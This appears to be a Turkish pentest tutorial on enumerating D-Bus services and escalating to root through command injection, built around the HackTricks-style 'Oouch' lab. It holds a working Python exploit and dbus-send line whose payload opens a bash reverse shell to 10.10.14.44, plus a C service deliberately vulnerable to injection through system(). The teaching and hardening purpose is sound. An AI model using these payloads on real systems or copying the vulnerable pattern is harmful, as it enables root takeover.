D-Bus Enumeration & Command Injection Privilege Escalation

Reading time: 17 minutes

GUI enumeration

D-Bus, Ubuntu masaüstü ortamlarında süreçler arası iletişim (IPC) arabulucusu olarak kullanılmaktadır. Ubuntu'da, birkaç mesaj otobüsünün eşzamanlı çalışması gözlemlenmektedir: sistem otobüsü, esasen sistem genelinde ilgili hizmetleri sergilemek için ayrıcalıklı hizmetler tarafından kullanılan ve her giriş yapmış kullanıcı için yalnızca o kullanıcıya özgü hizmetleri sergileyen bir oturum otobüsü. Burada odak, ayrıcalıkları yükseltme amacımız olduğundan, daha yüksek ayrıcalıklarla (örneğin, root) çalışan hizmetlerle ilişkili olması nedeniyle esas olarak sistem otobüsüne yöneliktir. D-Bus'un mimarisinin, istemcilerin iletişim kurmak istedikleri hizmet için belirttikleri adrese göre istemci mesajlarını uygun hizmetlere yönlendirmekten sorumlu bir 'yönlendirici' kullandığı belirtilmektedir.

D-Bus üzerindeki hizmetler, sergiledikleri nesneler ve arayüzler ile tanımlanır. Nesneler, standart OOP dillerindeki sınıf örneklerine benzetilebilir; her örnek, bir nesne yolu ile benzersiz bir şekilde tanımlanır. Bu yol, bir dosya sistemi yoluna benzer şekilde, hizmet tarafından sergilenen her nesneyi benzersiz bir şekilde tanımlar. Araştırma amaçları için önemli bir arayüz, org.freedesktop.DBus.Introspectable arayüzüdür ve tek bir yöntemi, Introspect'i içerir. Bu yöntem, nesnenin desteklediği yöntemlerin, sinyallerin ve özelliklerin XML temsiline döner; burada yöntemlere odaklanılmakta, özellikler ve sinyaller hariç tutulmaktadır.

D-Bus arayüzü ile iletişim kurmak için iki araç kullanılmıştır: D-Bus tarafından sergilenen yöntemlerin betiklerde kolayca çağrılmasını sağlamak için gdbus adlı bir CLI aracı ve her otobüsteki mevcut hizmetleri listelemek ve her hizmetteki nesneleri görüntülemek için tasarlanmış Python tabanlı bir GUI aracı olan D-Feet.

sudo apt-get install d-feet

İlk görüntüde D-Bus sistem veriyolu ile kaydedilen hizmetler gösterilmektedir, org.debin.apt özellikle Sistem Veriyolu düğmesi seçildikten sonra vurgulanmıştır. D-Feet bu hizmetten nesneleri sorgular, seçilen nesneler için arayüzleri, yöntemleri, özellikleri ve sinyalleri gösterir, bu ikinci görüntüde görülmektedir. Her yöntemin imzası da detaylandırılmıştır.

Dikkate değer bir özellik, hizmetin işlem kimliği (pid) ve komut satırı bilgilerini göstermesidir; bu, hizmetin yükseltilmiş ayrıcalıklarla çalışıp çalışmadığını doğrulamak için faydalıdır, araştırma açısından önemlidir.

D-Feet ayrıca yöntem çağrısı yapmaya da olanak tanır: kullanıcılar, D-Feet'in hizmete iletmeden önce D-Bus türlerine dönüştürdüğü Python ifadelerini parametre olarak girebilirler.

Ancak, bazı yöntemlerin kimlik doğrulaması gerektirdiğini unutmayın; bu yöntemleri çağırmamıza izin vermeden önce kimlik doğrulaması gerektirir. Amacımız, öncelikle kimlik bilgisi olmadan ayrıcalıklarımızı yükseltmek olduğu için bu yöntemleri göz ardı edeceğiz.

Ayrıca, bazı hizmetlerin, bir kullanıcının belirli eylemleri gerçekleştirmesine izin verilip verilmeyeceğini sorgulamak için org.freedeskto.PolicyKit1 adlı başka bir D-Bus hizmetini sorguladığını unutmayın.

Cmd line Enumeration

Hizmet Nesnelerini Listele

Açık D-Bus arayüzlerini listelemek mümkündür:

busctl list #List D-Bus interfaces

NAME                                   PID PROCESS         USER             CONNECTION    UNIT                      SE
:1.0                                     1 systemd         root             :1.0          init.scope                -
:1.1345                              12817 busctl          qtc              :1.1345       session-729.scope         72
:1.2                                  1576 systemd-timesyn systemd-timesync :1.2          systemd-timesyncd.service -
:1.3                                  2609 dbus-server     root             :1.3          dbus-server.service       -
:1.4                                  2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    -
:1.6                                  2612 systemd-logind  root             :1.6          systemd-logind.service    -
:1.8                                  3087 unattended-upgr root             :1.8          unattended-upgrades.serv… -
:1.820                                6583 systemd         qtc              :1.820        user@1000.service         -
com.ubuntu.SoftwareProperties            - -               -                (activatable) -                         -
fi.epitest.hostap.WPASupplicant       2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    -
fi.w1.wpa_supplicant1                 2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    -
htb.oouch.Block                       2609 dbus-server     root             :1.3          dbus-server.service       -
org.bluez                                - -               -                (activatable) -                         -
org.freedesktop.DBus                     1 systemd         root             -             init.scope                -
org.freedesktop.PackageKit               - -               -                (activatable) -                         -
org.freedesktop.PolicyKit1               - -               -                (activatable) -                         -
org.freedesktop.hostname1                - -               -                (activatable) -                         -
org.freedesktop.locale1                  - -               -                (activatable) -                         -

Bağlantılar

Wikipedia'dan: Bir süreç bir busa bağlantı kurduğunda, bus bu bağlantıya benzersiz bağlantı adı olarak adlandırılan özel bir bus adı atar. Bu tür bus adları değişmezdir—bağlantı var olduğu sürece değişmeyecekleri garanti edilir—ve daha da önemlisi, bus ömrü boyunca yeniden kullanılamazlar. Bu, o bus'a başka bir bağlantının asla böyle bir benzersiz bağlantı adı almayacağı anlamına gelir, aynı süreç bus'a olan bağlantıyı kapatıp yeni bir tane oluşturursa bile. Benzersiz bağlantı adları, aksi takdirde yasak olan iki nokta üst üste karakteri ile başladıkları için kolayca tanınabilir.

Servis Nesnesi Bilgisi

Sonra, arayüz hakkında bazı bilgileri elde edebilirsiniz:

busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface

PID=2609
PPID=1
TTY=n/a
UID=0
EUID=0
SUID=0
FSUID=0
GID=0
EGID=0
SGID=0
FSGID=0
SupplementaryGIDs=
Comm=dbus-server
CommandLine=/root/dbus-server
Label=unconfined
CGroup=/system.slice/dbus-server.service
Unit=dbus-server.service
Slice=system.slice
UserUnit=n/a
UserSlice=n/a
Session=n/a
AuditLoginUID=n/a
AuditSessionID=n/a
UniqueName=:1.3
EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
InheritableCapabilities=
BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read

Bir Servis Nesnesinin Arayüzlerini Listele

Yeterli izinlere sahip olmalısınız.

busctl tree htb.oouch.Block #Get Interfaces of the service object

└─/htb
└─/htb/oouch
└─/htb/oouch/Block

Bir Servis Nesnesinin Arayüzünü İnceleme

Bu örnekte, tree parametresi kullanılarak keşfedilen en son arayüzün seçildiğine dikkat edin (önceki bölüme bakın):

busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface

NAME                                TYPE      SIGNATURE RESULT/VALUE FLAGS
htb.oouch.Block                     interface -         -            -
.Block                              method    s         s            -
org.freedesktop.DBus.Introspectable interface -         -            -
.Introspect                         method    -         s            -
org.freedesktop.DBus.Peer           interface -         -            -
.GetMachineId                       method    -         s            -
.Ping                               method    -         -            -
org.freedesktop.DBus.Properties     interface -         -            -
.Get                                method    ss        v            -
.GetAll                             method    s         a{sv}        -
.Set                                method    ssv       -            -
.PropertiesChanged                  signal    sa{sv}as  -            -

Not edin ki htb.oouch.Block arayüzünün .Block metodu (ilgilendiğimiz olan). Diğer sütunlardaki "s" bir string beklediğini gösterebilir.

İzleme/Yakalama Arayüzü

Yeterli ayrıcalıklara sahip olduğunuzda (sadece send_destination ve receive_sender ayrıcalıkları yeterli değildir) D-Bus iletişimini izleyebilirsiniz.

Bir iletişimi izlemek için root olmanız gerekecek. Eğer root olmanıza rağmen sorun yaşıyorsanız https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/ ve https://wiki.ubuntu.com/DebuggingDBus adreslerine bakın.

İzleme için farklı yollar:

sudo busctl monitor htb.oouch.Block #Monitor only specified
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see

Aşağıdaki örnekte htb.oouch.Block arayüzü izleniyor ve "lalalalal" mesajı yanlış iletişim yoluyla gönderiliyor:

busctl monitor htb.oouch.Block

Monitoring bus message stream.
‣ Type=method_call  Endian=l  Flags=0  Version=1  Priority=0 Cookie=2
Sender=:1.1376  Destination=htb.oouch.Block  Path=/htb/oouch/Block  Interface=htb.oouch.Block  Member=Block
UniqueName=:1.1376
MESSAGE "s" {
STRING "lalalalal";
};

‣ Type=method_return  Endian=l  Flags=1  Version=1  Priority=0 Cookie=16  ReplyCookie=2
Sender=:1.3  Destination=:1.1376
UniqueName=:1.3
MESSAGE "s" {
STRING "Carried out :D";
};

capture yerine monitor kullanarak sonuçları bir pcap dosyasında kaydedebilirsiniz.

Tüm gürültüyü filtreleme

Eğer bus'ta çok fazla bilgi varsa, şöyle bir eşleşme kuralı geçirin:

dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"

Birden fazla kural belirtilebilir. Eğer bir mesaj herhangi bir kural ile eşleşiyorsa, mesaj yazdırılacaktır. Böyle:

dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"

dbus-monitor "type=method_call" "type=method_return" "type=error"

Daha fazla bilgi için D-Bus belgelerine bakın.

Daha Fazla

busctl'nin daha fazla seçeneği vardır, hepsini burada bulabilirsiniz.

Zayıf Senaryo

HTB'den "oouch" ana bilgisayarı içindeki qtc kullanıcısı olarak, /etc/dbus-1/system.d/htb.oouch.Block.conf konumunda bulunan beklenmedik bir D-Bus yapılandırma dosyası bulabilirsiniz:

<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->

<!DOCTYPE busconfig PUBLIC
"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">

<busconfig>

<policy user="root">
<allow own="htb.oouch.Block"/>
</policy>

<policy user="www-data">
<allow send_destination="htb.oouch.Block"/>
<allow receive_sender="htb.oouch.Block"/>
</policy>

</busconfig>

Önceki yapılandırmadan not edin ki bu D-BUS iletişimi aracılığıyla bilgi göndermek ve almak için root veya www-data kullanıcısı olmanız gerekecek.

Docker konteyneri aeb4525789d8 içindeki qtc kullanıcısı olarak, /code/oouch/routes.py dosyasında bazı dbus ile ilgili kodlar bulabilirsiniz. Bu ilginç kod:

if primitive_xss.search(form.textfield.data):
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')

client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr)
response = block_iface.Block(client_ip)
bus.close()
return render_template('hacker.html', title='Hacker')

Gördüğünüz gibi, bir D-Bus arayüzüne bağlanıyor ve "Block" fonksiyonuna "client_ip" gönderiyor.

D-Bus bağlantısının diğer tarafında bazı C derlenmiş ikili dosyalar çalışıyor. Bu kod, D-Bus bağlantısında IP adresini dinliyor ve verilen IP adresini engellemek için system fonksiyonu aracılığıyla iptables'ı çağırıyor.
system çağrısı, komut enjeksiyonuna karşı kasıtlı olarak savunmasızdır, bu nedenle aşağıdaki gibi bir yük, ters bir shell oluşturacaktır: ;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #

Bunu Sömür

Bu sayfanın sonunda D-Bus uygulamasının tam C kodunu bulabilirsiniz. İçinde, 91-97. satırlar arasında D-Bus nesne yolu ve arayüz adının nasıl kaydedildiğini bulabilirsiniz. Bu bilgi, D-Bus bağlantısına bilgi göndermek için gerekli olacaktır:

/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block",  /* interface */
"htb.oouch.Block",   /* service object */
block_vtable,
NULL);

Ayrıca, 57. satırda bu D-Bus iletişimi için kayıtlı tek yöntem Block olarak adlandırıldığını görebilirsiniz (Bu yüzden, bir sonraki bölümde yükler hizmet nesnesi htb.oouch.Block, arayüz /htb/oouch/Block ve yöntem adı Block'a gönderilecektir):

SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),

Python

Aşağıdaki python kodu, yükü block_iface.Block(runme) aracılığıyla Block metoduna D-Bus bağlantısına gönderecektir (önceki kod parçasından alındığını unutmayın):

import dbus
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #"
response = block_iface.Block(runme)
bus.close()

busctl ve dbus-send

dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'

• dbus-send, "Message Bus" a mesaj göndermek için kullanılan bir araçtır.
• Message Bus – Sistemlerin uygulamalar arasında iletişim kurmasını kolaylaştıran bir yazılımdır. Mesaj Kuyruğu ile ilişkilidir (mesajlar sıralı bir şekilde düzenlenir) ancak Message Bus'ta mesajlar bir abonelik modeli ile gönderilir ve ayrıca çok hızlıdır.
• “-system” etiketi, bunun bir oturum mesajı değil, bir sistem mesajı olduğunu belirtmek için kullanılır (varsayılan olarak).
• “–print-reply” etiketi, mesajımızı uygun bir şekilde yazdırmak ve herhangi bir yanıtı insan tarafından okunabilir bir formatta almak için kullanılır.
• “–dest=Dbus-Interface-Block” Dbus arayüzünün adresidir.
• “–string:” – Arayüze göndermek istediğimiz mesajın türüdür. Mesaj göndermenin birkaç formatı vardır; bunlar arasında double, bytes, booleans, int, objpath bulunmaktadır. Bunlardan “object path”, bir dosyanın yolunu Dbus arayüzüne göndermek istediğimizde kullanışlıdır. Bu durumda, bir dosya adıyla arayüze bir komut iletmek için özel bir dosya (FIFO) kullanabiliriz. “string:;” – Bu, FIFO ters shell dosyası/komutunu yerleştirdiğimiz yerden nesne yolunu tekrar çağırmak içindir.

Dikkat edin ki htb.oouch.Block.Block içinde, ilk kısım (htb.oouch.Block) hizmet nesnesini, son kısım ise (.Block) yöntem adını referans alır.

C kodu

//sudo apt install pkgconf
//sudo apt install libsystemd-dev
//gcc d-bus_server.c -o dbus_server `pkg-config --cflags --libs libsystemd`

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <systemd/sd-bus.h>

static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) {
char* host = NULL;
int r;

/* Read the parameters */
r = sd_bus_message_read(m, "s", &host);
if (r < 0) {
fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r));
return r;
}

char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP";

int command_len = strlen(command);
int host_len = strlen(host);

char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));
if(command_buffer == NULL) {
fprintf(stderr, "Failed to allocate memory\n");
return -1;
}

sprintf(command_buffer, command, host);

/* In the first implementation, we simply ran command using system(), since the expected DBus
* to be threading automatically. However, DBus does not thread and the application will hang
* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real
* multithreading)
*/
int pid = fork();

if ( pid == 0 ) {
/* Here we are in the child process. We execute the command and eventually exit. */
system(command_buffer);
exit(0);
} else {
/* Here we are in the parent process or an error occured. We simply send a genric message.
* In the first implementation we returned separate error messages for success or failure.
* However, now we cannot wait for results of the system call. Therefore we simply return
* a generic. */
return sd_bus_reply_method_return(m, "s", "Carried out :D");
}
r = system(command_buffer);
}


/* The vtable of our little object, implements the net.poettering.Calculator interface */
static const sd_bus_vtable block_vtable[] = {
SD_BUS_VTABLE_START(0),
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
SD_BUS_VTABLE_END
};


int main(int argc, char *argv[]) {
/*
* Main method, registeres the htb.oouch.Block service on the system dbus.
*
* Paramaters:
*      argc            (int)             Number of arguments, not required
*      argv[]          (char**)          Argument array, not required
*
* Returns:
*      Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive
*      as long as the user keeps it alive.
*/


/* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */
signal(SIGCHLD,SIG_IGN);

sd_bus_slot *slot = NULL;
sd_bus *bus = NULL;
int r;

/* First we need to connect to the system bus. */
r = sd_bus_open_system(&bus);
if (r < 0)
{
fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r));
goto finish;
}

/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block",  /* interface */
"htb.oouch.Block",   /* service object */
block_vtable,
NULL);
if (r < 0) {
fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r));
goto finish;
}

/* Register the service name to find out object */
r = sd_bus_request_name(bus, "htb.oouch.Block", 0);
if (r < 0) {
fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r));
goto finish;
}

/* Infinite loop to process the client requests */
for (;;) {
/* Process requests */
r = sd_bus_process(bus, NULL);
if (r < 0) {
fprintf(stderr, "Failed to process bus: %s\n", strerror(-r));
goto finish;
}
if (r > 0) /* we processed a request, try to process another one, right-away */
continue;

/* Wait for the next request to process */
r = sd_bus_wait(bus, (uint64_t) -1);
if (r < 0) {
fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r));
goto finish;
}
}

finish:
sd_bus_slot_unref(slot);
sd_bus_unref(bus);

return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}

Otomatik Enumere Yardımcıları (2023-2025)

busctl/gdbus ile büyük bir D-Bus saldırı yüzeyinin manuel olarak enumere edilmesi hızlı bir şekilde acı verici hale gelir. Son birkaç yılda piyasaya sürülen iki küçük FOSS aracı, kırmızı takım veya CTF etkinlikleri sırasında işleri hızlandırabilir:

dbusmap ("D-Bus için Nmap")

• Yazar: @taviso – https://github.com/taviso/dbusmap
• C ile yazılmış; her nesne yolunu dolaşan, Introspect XML'ini çeken ve bunu sahip PID/UID ile eşleştiren tek bir statik ikili (<50 kB).
• Kullanışlı bayraklar:

# *sistem* otobüsündeki her hizmeti listele ve çağrılabilir tüm yöntemleri dök
sudo dbus-map --dump-methods

# Polkit istemleri olmadan erişebileceğiniz yöntemleri/özellikleri aktif olarak sorgulayın
sudo dbus-map --enable-probes --null-agent --dump-methods --dump-properties

• Araç, korunmasız bilinen adları ! ile işaretler, böylece sahip olabileceğiniz (devralabileceğiniz) hizmetleri veya yetkisiz bir kabuktan erişilebilen yöntem çağrılarını anında ortaya çıkarır.

uptux.py

• Yazar: @initstring – https://github.com/initstring/uptux
• Systemd birimlerinde ve aşırı izinli D-Bus politika dosyalarında (yazılabilir yolları arayan) yalnızca Python ile yazılmış bir betik (örneğin, send_destination="*").
• Hızlı kullanım:

python3 uptux.py -n          # tüm kontrolleri çalıştır ama bir günlük dosyası yazma
python3 uptux.py -d          # ayrıntılı hata ayıklama çıktısını etkinleştir

• D-Bus modülü, aşağıdaki dizinleri arar ve normal bir kullanıcı tarafından sahte veya ele geçirilebilecek herhangi bir hizmeti vurgular:
• /etc/dbus-1/system.d/ ve /usr/share/dbus-1/system.d/
• /etc/dbus-1/system-local.d/ (satıcı geçersiz kılmaları)

Dikkate Değer D-Bus Yetki Yükseltme Hataları (2024-2025)

Yeni yayımlanan CVE'lere dikkat etmek, özel kodda benzer güvensiz kalıpları tespit etmeye yardımcı olur. Aşağıdaki yüksek etkili yerel EoP sorunları, sistem otobüsünde kimlik doğrulama/ yetkilendirme eksikliğinden kaynaklanmaktadır:

Dikkat edilmesi gereken kalıplar:

1. Hizmet sistem otobüsünde kök olarak çalışıyor.
2. PolicyKit kontrolü yok (veya bir proxy tarafından atlanıyor).
3. Yöntem nihayetinde system()/paket yükleme/cihaz yeniden yapılandırmasına → kod yürütmeye yol açıyor.

Bir yamanın uygun polkit_authority_check_authorization() mantığını geri taşıyıp taşımadığını doğrulamak için dbusmap --enable-probes veya manuel busctl call kullanın.

Güçlendirme & Tespit Hızlı Kazançlar

• Dünya yazılabilir veya gönderme/alma açık politikaları arayın:

grep -R --color -nE '<allow (own|send_destination|receive_sender)="[^"]*"' /etc/dbus-1/system.d /usr/share/dbus-1/system.d

• Tehlikeli yöntemler için Polkit gerektirin – hatta kök proxy'ler bile kendi PID'lerini polkit_authority_check_authorization_sync()'a iletmelidir.
• Uzun süreli yardımcı programlarda ayrıcalıkları düşürün (otobüse bağlandıktan sonra ad alanlarını değiştirmek için sd_pid_get_owner_uid() kullanın).
• Bir hizmeti kaldıramıyorsanız, en azından onu özel bir Unix grubuna sınırlayın ve XML politikasında erişimi kısıtlayın.
• Mavi takım: busctl capture --output=/var/log/dbus_$(date +%F).pcap ile sistem otobüsünün sürekli yakalanmasını etkinleştirin ve anomali tespiti için Wireshark'a aktarın.

Referanslar

• https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

• https://security.opensuse.org/2025/01/24/dde-api-proxy-privilege-escalation.html

• https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/